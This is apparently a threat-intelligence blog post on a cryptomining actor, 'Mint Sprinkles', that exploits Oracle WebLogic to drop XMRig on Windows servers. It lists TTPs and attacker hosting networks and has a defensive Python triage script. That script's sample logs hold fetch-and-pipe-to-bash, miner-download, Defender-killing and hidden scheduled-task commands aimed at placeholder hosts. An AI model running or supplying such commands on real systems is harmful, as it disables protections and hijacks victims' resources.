Before diving into this activity cluster, be sure to read the series introduction.
In this second blog in our ice cream activity cluster series, we look back at a historic actor we’ve dubbed Mint Sprinkles.
When we have sufficient evidence that the same threat actors are behind different activities, but we observe a significant shift in capabilities, attacker infrastructure, or targeted victims, we build on the established flavor (in this case, Mint) with a topping, such as sprinkles. The topping signals that although the same actors are likely behind the activity, the way we track or cluster the new activity is different. We still believe this activity is Mint, but it has evolved significantly enough to warrant a distinct name: Mint Sprinkles.
You may have noticed that we discussed ‘Mint Evolution’ under one of the headings in the original Mint blog. To be clear, the changes to their TTPs described there were worth discussing, but they left the way we cluster, and therefore track, the group mostly unaffected. In this instance, the evolution altered how we cluster and codify the activity.
Evolution of Mint to Mint Sprinkles
As previously documented, Mint typically looks for vulnerable Linux servers, sends an RCE exploit to gain initial access, then sets up persistence mechanisms before hijacking the target’s resources to mine cryptocurrency.
The development observed in the Alert Logic dataset was a shift from targeting Linux to targeting vulnerable Windows machines. The change in target OS required a drastic change in TTPs and capabilities, hence the distinct evolution to Mint with Sprinkles.
Mint Sprinkles’ exploitation of Windows machines followed Mint’s earlier success exploiting Linux machines running Citrix Application Delivery Controller (ADC). Always on the lookout for the latest RCE exploit, the group moved on to, among others, the 2020 Oracle WebLogic RCE. Successful exploitation gave them remote access, but unlike Citrix ADC, Oracle’s WebLogic software runs on both Linux and Windows systems.
Initially, we observed the classic Mint tactics on the Windows devices: pulling down .sh files and attempting, unsuccessfully, to run Linux commands. Threat hunters found Windows PowerShell logs that effectively said “command doesn’t exist.” Mint would have understood that reaching this stage meant the exploit had succeeded, yet a good portion of victims were no longer progressing to the installation stage.
Mint tends to use spray-and-pray techniques to find vulnerable servers, often attempting the exploit as its first action and thereby condensing the reconnaissance, delivery, and exploitation stages of the kill chain into one.
In scenarios where we did observe distinct reconnaissance and exploitation phases, the requests carried no operating-system identification, meaning Mint was not attempting to differentiate between operating systems. Our hypothesis is that the shift to Windows tactics was the group’s response to capitalize on the Windows access it had inadvertently gained during the Oracle WebLogic campaign.
Essentially, they now controlled both Windows and Linux machines, but their existing TTPs gave them no way to monetize the access on the Windows machines.
This resulted in a new set of Windows-centric capabilities that took a different route but arrived at the same outcome: dropping crypto miners.
The tactics, techniques, and procedures remain consistent across the reconnaissance, delivery, and exploitation phases for both Mint and Mint Sprinkles. Shifting focus to Windows servers required Mint Sprinkles to employ tactics that work on Windows machines, but key common indicators remained. For example, a consistent filename was observed, with a ‘w’ character added to flag the Windows variant and a change in dropper file type (an .xml file in place of the Linux shell script).
The first dropper, the .xml file, pulled a second dropper, 1.ps1, which killed known competition (other miners), terminated security prevention processes (such as EDR agents), and established persistence via a scheduled task.
Mint Sprinkles then pulled an XMRig miner alongside a config.json file containing the mining instructions, the login details, and the mining pool, which in effect establishes the miner’s command and control. Elements of this configuration have been consistent across victims and have helped attribute activity to Mint and Mint Sprinkles.
The actions performed by the new files produced the same outcomes typical of Mint. The attacker infrastructure also remained consistent between Mint and Mint Sprinkles: again, they favored Russian and ex-Soviet IP address space. Keep in mind that the geolocation of attacker infrastructure does not amount to attribution.
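The Windows installation chain described above (the failed Linux one-liner, the 1.ps1 stage that kills competing miners and security processes, scheduled-task persistence, the miner download, and the config.json used for attribution), as an added example that is not Alert Logic’s code or the actor’s scripts: a Python triage script that runs simple rules over constructed PowerShell script block log text and then pulls the pool and wallet out of an XMRig-style config.json. The host 203.0.113.10, the file and task names, the process lists in the rules, and the wallet are all placeholders assumed for the example, not observed indicators.

```python
import json
import re

# Constructed PowerShell Script Block Logging (Event ID 4104) contents, modelled
# on the behaviours described in the post. The host, file names, task name and
# process names are placeholders chosen for this example, not observed indicators.
SAMPLE_SCRIPT_BLOCKS = [
    # Classic Mint stage sent to a Windows host: 'bash' is not a cmdlet, so
    # PowerShell logs a CommandNotFoundException and nothing is installed.
    "curl http://203.0.113.10/x.sh | bash",
    # 1.ps1-style stage: kill competing miners, then the local security agent.
    "taskkill /f /im xmrig.exe; taskkill /f /im minerd.exe",
    "Stop-Process -Name MsMpEng -Force",
    # Persistence: a scheduled task that re-runs the dropper every five minutes.
    'schtasks /create /tn "WinUpdate" /tr "powershell -w hidden -f C:\\Users\\Public\\1.ps1" /sc minute /mo 5 /f',
    # Final stage: fetch the miner binary.
    "Invoke-WebRequest -Uri http://203.0.113.10/xmrig.exe -OutFile C:\\Users\\Public\\xmrig.exe",
    # Routine admin activity that should not match any rule.
    "Get-ChildItem C:\\Windows\\Temp | Sort-Object LastWriteTime",
]

# Each rule is (name, pattern). The miner and agent process lists are
# illustrative (an assumption of this example); a real deployment would use
# the names seen in its own telemetry.
RULES = [
    ("linux_tooling_on_windows",
     re.compile(r"\b(curl|wget)\b[^|]*\.sh\b.*\|\s*(ba)?sh\b", re.I)),
    ("kill_competing_miner",
     re.compile(r"taskkill\b.*?/im\s+(xmrig|minerd)\b", re.I)),
    ("kill_security_process",
     re.compile(r"(Stop-Process\b.*-Name|taskkill\b.*/im)\s+"
                r"(MsMpEng|MsSense|SentinelAgent|CSFalconService)\b", re.I)),
    ("scheduled_task_persistence",
     re.compile(r"schtasks\b.*/create\b|Register-ScheduledTask\b", re.I)),
    ("miner_download",
     re.compile(r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|curl|wget)\b.*xmrig", re.I)),
]


def classify(script_block):
    """Names of every rule the script block trips (empty list = nothing)."""
    return [name for name, pattern in RULES if pattern.search(script_block)]


def triage(script_blocks):
    """Map each rule name to the indices of the blocks that tripped it."""
    hits = {name: [] for name, _ in RULES}
    for i, block in enumerate(script_blocks):
        for name in classify(block):
            hits[name].append(i)
    return hits


# Constructed XMRig-style config.json. The pool host and wallet are placeholders.
SAMPLE_CONFIG_JSON = json.dumps({
    "autosave": True,
    "cpu": {"enabled": True, "max-threads-hint": 100},
    "pools": [{
        "url": "pool.example.invalid:3333",
        "user": "WALLET_PLACEHOLDER.worker01",
        "pass": "x",
        "tls": False,
        "keepalive": True,
    }],
})


def miner_indicators(config_text):
    """Extract the fields of an XMRig config.json worth pivoting on.

    'url' is the mining pool (the miner's effective C2) and 'user' carries the
    wallet address. Pools commonly let the miner append a worker name after a
    '.'; that separator is an assumption here, some pools use others.
    """
    cfg = json.loads(config_text)
    out = []
    for pool in cfg.get("pools", []):
        wallet, _, worker = str(pool.get("user", "")).partition(".")
        out.append({
            "pool": pool.get("url"),
            "wallet": wallet,
            "worker": worker or None,
            "tls": bool(pool.get("tls", False)),
        })
    return out


if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{rule:28s} blocks {idx}")
    for ind in miner_indicators(SAMPLE_CONFIG_JSON):
        print(ind)
```

The first rule is the cheap tell from the failed phase the post describes: Linux download-and-pipe one-liners showing up in Windows script block logs mean the exploit landed even though the install did not. The wallet and pool fields are the ones to pivot on across victims, since they have to stay constant for the actor to get paid.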
All the points discussed, as well as indicators we have withheld from publication, strongly suggest that this is an evolution of the Mint flavor. The adaptation of the flavor’s capabilities to work with Windows machines warrants a distinction in nomenclature – hence Mint Sprinkles.
Known Exploits Used
Tags in brackets give the kill-chain phase: recon, delivery, exploit, inst (installation), C2, AoO (actions on objectives).
- CVE-2020-14882 (Oracle WebLogic) [exp]
- CVE-2020-14750 (Oracle WebLogic) [exp]
Tactics, Techniques, and Procedures
- Active Scanning – T1595 [recon]
- Exploit Public-Facing Application – T1190 [recon/delivery/exploit]
- Constant User-Agent [recon/delivery/exploit/C2]
- …w.xml [inst dropper]
- 1.ps1 [inst/AoO]
- Scheduled Task/Job: Scheduled Task – T1053.005 [inst/persistence]
- config.json [inst/AoO]
- xmrig.exe [inst/AoO]
- Ingress Tool Transfer – T1105 [inst/C2]
- XMRig crypto mining [AoO]
- Resource Hijacking – T1496 [AoO]
Targets
- Vulnerable Windows servers
Attacker Infrastructure (autonomous systems)
- PINDC-AS [recon]
- RMINJINERING [recon]
- SELECTEL [recon]
- LLC BAXET [inst]
- EUROBYTE Eurobyte LLC [inst]
- NTSERVICE-AS [inst]
Actions on Objectives
- Crypto mining (XMRig)